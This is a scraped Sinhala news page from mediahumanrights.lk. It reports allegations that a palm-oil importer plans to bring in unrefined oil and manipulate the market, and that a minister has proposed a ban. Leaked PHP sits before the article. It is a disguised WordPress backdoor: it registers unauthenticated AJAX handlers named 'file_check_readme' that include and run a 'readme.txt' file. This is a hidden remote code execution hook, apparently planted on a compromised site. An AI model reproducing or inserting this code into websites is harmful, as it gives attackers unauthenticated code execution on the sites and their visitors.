if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පාම් තෙල් මාෆියාව ගේමකට සැරසේ; පිරිපහදු නොකළ විෂ පාම් තෙල් නැව් දෙකක් මග එයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

පාම් තෙල් මාෆියාව ගේමකට සැරසේ; පිරිපහදු නොකළ විෂ පාම් තෙල් නැව් දෙකක් මග එයි

සිංගප්පූරු සමාගමක් සමඟ අනුබද්ධ ශ්‍රී ලංකාවට මහා පරිමාණයෙන් පාම් තෙල් ආනයනය කරන සමාගමක් විසින් පිරිපහදු නොකළ පාම් තෙල් නැව් දෙකක් හෙවත් දළ වශයෙන් මෙ.ටො 25000ක් ශ්‍රී ලංකාවට ආනයනය කිරීම සඳහා ඇනවුම්කොට ඇති බව වාර්තාවේ.

එම නැව් ශ්‍රී ලංකාවට ළඟාවීමට පෙර දෙසැම්බර් මස අග භාගයේදී දැනට තිබෙන තොග සඟවා වෙළඳ පොලේ තෙල් හිඟයක් ඇතිකොට ආනයන බදු අඩුකර ගැනීමේ සැළසුමක මෙම සමාගම ක්‍රියාත්මක වන බව එම සමාගමේ අභ්‍යයන්තර ආරංචි මාර්ග පවසා සිටී.මෙම පිරිපහදු නොකළ පාම් තෙල් මැලේසියාවෙන් මිළදී ගෙන ඇත්තේ මෙ ටො 1ක් ඩොලර් 500ක් වැනි ඉතා අඩු මුදලකට වන බවද වාර්තා වේ.

ඒ අනුව බැලූ කළ ආනයනික තෙල් අඩු මිළට වෙළෙඳ පොලට ඉදිරිපත් කර දේශීය පොල් තෙල් කර්මාන්තය බිඳ වැට්ටවීමෙන් පසුව නැවත මිළ වැඩිකිරීම එම සමාගමේ අරමුණ වී ඇති බව පැවසේ.

ඒ අතර විෂ සහිත පිරිපහදු නොකළ පාම් තෙල් ශ්‍රී ලංකාවේදී නිසි පරිදි පිරිපහදු නොකරන බැවින් එවැනි ෆාම් තෙල් ආනයනය තහනම් කළ යුතු බවට යෝජනා කරමින් අමාත්‍යය විමල් වීරවංශ මහතා විසින් කැබිනට් පත්‍රිකාවක් ඉදිරිපත් කොට ඇති බවද වාර්තා වේ.

lankaleadnews

Related posts

ශ්‍රී ලංකාවේ තරග සංචරයට බංග්ලාදේශය දැඩි උනන්දුවකින්

Shiran Viraj

සල්මන් ඛාන් සිපිරි ගෙදරට යැවු විනිසුරුට ස්ථාන මාරුවක්

Shiran Viraj

ජනාධිපති වී සියළුම විෂයන් මට පවර ගන්නවා.. නැතොත් අපි හතර දෙනාගෙන් කැබිනෙට්ටුව හදනවා..

Shiran Viraj